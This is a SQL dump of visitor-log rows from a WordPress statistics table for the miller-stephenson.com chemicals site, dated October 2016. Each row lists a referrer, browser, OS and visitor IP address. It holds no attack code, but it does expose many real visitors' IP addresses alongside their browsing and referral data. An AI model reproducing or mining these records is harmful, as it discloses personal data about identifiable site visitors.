INSERT INTO `wp_statistics_visitor` VALUES (5785, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.231.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5786, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '104.128.38.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5787, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.120.12.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5788, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.41.114.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5789, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.92.25.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5790, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.191.241.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5791, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.218.6.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5792, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.123.53.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5793, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.29.65.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5794, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5795, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjW9MzJ4uTPAhWOJYEKHTHGBNQYABAA&sig=AOD64_1-YtQ0lxUxp81xN9_rY1D1kxATeA&rct=j&q=&ved=0ahUKEwir38nJ4uTPAhWDGT4KHShaA-0Q0QwIlAE&adurl=', 'MSIE', 'Windows', '11.0', '', '12.104.16.2', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5796, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjzs-_f4uTPAhWFI4EKHd9kCtIYABAB&ei=fk0GWIW_LILl-AHxsJ74Bw&sig=AOD64_0hhp1JPo4p0G5sougXo90QuYzdIg&rct=j&q=&sqi=2&ved=0ahUKEwiF9uvf4uTPAhWCMj4KHXGYB38Q0QwIIQ&adurl=', 'MSIE', 'Windows', '11.0', '', '65.196.168.6', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5797, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5798, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/lubricants/tribosys-lubricants/oils-greases/', 'MSIE', 'Windows', '11.0', '', '97.84.33.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5799, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '78.186.143.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5800, '2016-10-18', 'https://www.miller-stephenson.com/contact/', 'MSIE', 'Windows', '9.0', '', '182.118.21.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5801, '2016-10-18', 'https://www.google.com', 'Firefox', 'Windows', '44.0', '', '192.146.217.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5802, '2016-10-18', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.198.64.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5803, '2016-10-18', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiK-aj15OTPAhUEZIYKHTf_BAMYABAA&sig=AOD64_33QoRPcXxYvQ7ny3ECJ6io1v_h9g&rct=j&q=&ved=0ahUKEwjIqqX15OTPAhXLJB4KHXOMC6cQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '199.202.148.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5804, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.11', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5805, '2016-10-18', 'https://www.spacetechexpo.com/visit/exhibitor-list-2017', 'Chrome', 'Windows', '51.0.2704.84', '', '112.196.84.195', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5806, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5807, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.107.192.232', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5808, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.199.33.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5809, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&cad=rja&uact=8&ved=0ahUKEwiI7ILs1-TPAhUC1CYKHauAABk4ChAWCBswAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '24.155.88.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5810, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5811, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '204.27.156.147', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5812, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '24.46.34.196', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5813, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.158.95.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5814, '2016-10-18', 'https://www.miller-stephenson.com/miller/adhesive_kits.html', 'MSIE', 'Windows', '9.0', '', '182.118.20.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5815, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '173.166.127.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5816, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.15.182.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5817, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.55.153.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5818, '2016-10-18', 'https://www.searchincognito.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.229.139.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5819, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '204.108.18.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5820, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.25.122.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5821, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '192.28.0.15', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5822, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.159.223.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5823, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.78.241.241', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5824, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5825, '2016-10-18', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5826, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '164.107.191.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5827, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiOsqb58OTPAhWCWYYKHXoNC-EYABAA&sig=AOD64_0Nn5yP9_-MJRHJmG93EhBVVTMTxw&rct=j&q=&ved=0ahUKEwjlu6P58OTPAhUKWh4KHWaoDEAQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '69.74.43.38', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5828, '2016-10-18', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '11.0', '', '184.180.137.126', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5829, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '104.240.103.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5830, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.67.23.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5831, '2016-10-18', 'https://www.google.ca/', 'Edge', 'Windows', '13.10586', '', '192.64.142.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5832, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.32.165.12', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5833, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.16.102.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5834, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '119.137.3.236', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5835, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwir6KOT9OTPAhWEOCYKHU3mBbEQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '204.136.186.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5836, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.251.182.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5837, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '72.66.115.14', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5838, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.119.142.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5839, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.107.156.97', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5840, '2016-10-18', 'https://www.miller-stephenson.com/wp-login.php', 'Firefox', 'Windows', '34.0', '', '79.107.152.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5841, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.233.214.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5842, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5843, '2016-10-18', 'https://expo.spacecomexpo.com/SPC16/Public/eBooth.aspx?IndexInList=45&FromPage=Exhibitors.aspx&ParentBoothID=&ListByBooth=true&BoothID=322899', 'Chrome', 'Windows', '53.0.2785.143', '', '49.207.50.160', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5844, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5845, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '158.147.158.204', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5846, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '68.51.87.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5847, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.22.55.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5848, '2016-10-18', 'https://r.search.yahoo.com/_ylt=AwrTHRnIZgZYC14AqZ5XNyoA;_ylu=X3oDMTEyaHVpdGM3BGNvbG8DZ3ExBHBvcwM0BHZ0aWQDQjE4NzlfMQRzZWMDc3I-/RV=2/RE=1476843337/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fchemicals%2flubricants%2fkrytox-lubricants%2f/RK=0/RS=2MkXzegehAglj6i1kGn0E0uEPg4-', 'Firefox', 'Windows', '49.0', '', '73.183.160.187', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5849, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj438i7--TPAhVINoEKHYzeBdMYABAF&ei=aWcGWLaoHcOi-AHpm7K4Dg&sig=AOD64_2O674WiZNyQz-Yzu6jqJkmoyh87w&rct=j&q=&sqi=2&ved=0ahUKEwj2gMW7--TPAhVDET4KHemNDOcQ0QwIUg&adurl=', 'MSIE', 'Windows', '11.0', '', '199.197.244.6', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5850, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.121.10.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5851, '2016-10-18', 'https://www.bing.com/search?q=miller+stephenson+chemi&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '199.64.6.153', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5852, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.111.129.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5853, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.39.82.154', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5854, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '103.59.179.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5855, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.53.138.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5856, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj05-Wm_OTPAhWB4yYKHYpgB2wQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '130.199.3.165', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5857, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '70.195.192.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5858, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj9sc_7_OTPAhWFKiYKHa0OCmoQFggnMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fcontact%2F&usg=AFQjCNE8T3eWNAa7jFCvKjHO-SI6GhqPtQ&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '68.115.50.82', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5859, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Chrome OS', '52.0.2743.85', '', '73.46.65.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5860, '2016-10-18', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '174.88.32.229', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5861, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '104.254.107.66', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5862, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '122.90.140.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5863, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwiJ7Jap_eTPAhXH_R4KHSnqD_wQFghIMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg&bvm=bv.135974163,d.dmo', 'MSIE', 'Windows', '11.0', '', '199.29.132.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5864, '2016-10-18', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5865, '2016-10-18', 'https://www.miller-stephenson.com', 'Apache-HttpClient', 'Unknown', '4.2.5', '', '121.205.201.95', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5866, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '64.4.81.78', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5867, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '166.170.0.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5868, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '199.64.6.150', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5869, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwig8e21geXPAhUIGmkKHX9BD9wYABAA&sig=AOD64_1UJ3aPRiHNfq6snNgzqx-3YRoTDg&rct=j&q=&ved=0ahUKEwjtyOi1geXPAhUB6yYKHV24AaUQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '206.248.1.197', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5870, '2016-10-18', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5871, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj7zr_IgeXPAhUFOiYKHcEdCIUQFggzMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=T8FQMRvk3zH3dwGzZyDf7Q&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '71.40.12.162', '000', 39, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5872, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '21.0', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5873, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '120.10.181.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5874, '2016-10-18', 'https://www.miller-stephenson.com/miller/electrical_lubricants.html', 'MSIE', 'Windows', '9.0', '', '182.118.20.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5875, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '190.74.225.240', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5876, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.91.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5877, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.49.55.56', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5878, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.45.43.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5879, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.243.182.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5880, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjM_7eKheXPAhXJNiYKHZ5lDvEQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-222N%2C%2520222T.pdf&usg=AFQjCNFZCZI5wPs-cCRMQ4pGlbR-8wR9Tw&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '134.223.116.156', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5881, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiyj9a-heXPAhUJkGkKHeDBClQYABAA&ei=7HEGWP2UFYuUjwTd442wAw&sig=AOD64_1QbkgWGPUrsnl-pMOOfq1ip8Ao1w&rct=j&q=&sqi=2&ved=0ahUKEwj9utK-heXPAhULyoMKHd1xAzYQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '70.182.223.228', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5882, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjv4Pj8heXPAhVBcj4KHZb_BfQQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=t2M108N6uCF7Z_OldRco8Q&bvm=bv.135974163,d.cWw', 'MSIE', 'Windows', '11.0', '', '192.168.2.152', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5883, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '108.53.187.9', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5884, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '39.0.2171.95', '', '50.22.90.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5885, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '45.0', '', '107.191.102.245', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5886, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '173.250.195.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5887, '2016-10-18', 'https://107.191.102.245/', 'Chrome', 'Windows', '53.0.2785.143', '', '181.174.106.182', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5888, '2016-10-18', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.3', '', '198.46.251.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5889, '2016-10-18', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.171.157.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5890, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '45.32.129.200', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5891, '2016-10-18', 'https://www.miller-stephenson.com/product/tm7/', 'Safari', 'iPhone', '7.0', '', '199.30.24.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5892, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.103', '', '160.130.190.118', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5893, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj2g4XnieXPAhUMEIEKHQUfBdQYABAA&sig=AOD64_350di6xO4cLFoIlY0QSPH7wXf2kA&rct=j&q=&ved=0ahUKEwim0f_mieXPAhXF8z4KHRgwBWUQ0QwIHQ&adurl=', 'MSIE', 'Windows', '11.0', '', '96.61.83.249', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5894, '2016-10-18', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjC8OX1ieXPAhUNjGkKHdSDCOgYABAE&sig=AOD64_36jqfsRm8wGbI7e0GbeSxAeJltdg&rct=j&q=&ved=0ahUKEwjG--H1ieXPAhVFQSYKHVbhDu8Q0QwIcw&adurl=', 'MSIE', 'Windows', '11.0', '', '69.144.175.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5895, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '129.207.166.166', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5896, '2016-10-18', 'https://www.miller-stephenson.com/product/teflon-white-lithium-grease/', 'Safari', 'iPhone', '7.0', '', '199.30.25.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5897, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.215.226.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5898, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '104.156.230.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5899, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '107.1.77.198', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5900, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.73.148.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5901, '2016-10-18', 'https://www.practicalmachinist.com/vb/general/need-advice-removing-epoxy-brass-173352/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.166.171.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5902, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '129.22.226.51', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5903, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '51.0', '', '68.106.144.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5904, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiluc_zjuXPAhWGGT4KHZIYASEQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '143.62.140.211', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5905, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5906, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '74.217.90.250', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5907, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.217.90.250', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5908, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.182.69', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5909, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.101', '', '68.193.188.205', '000', 26, 0); 
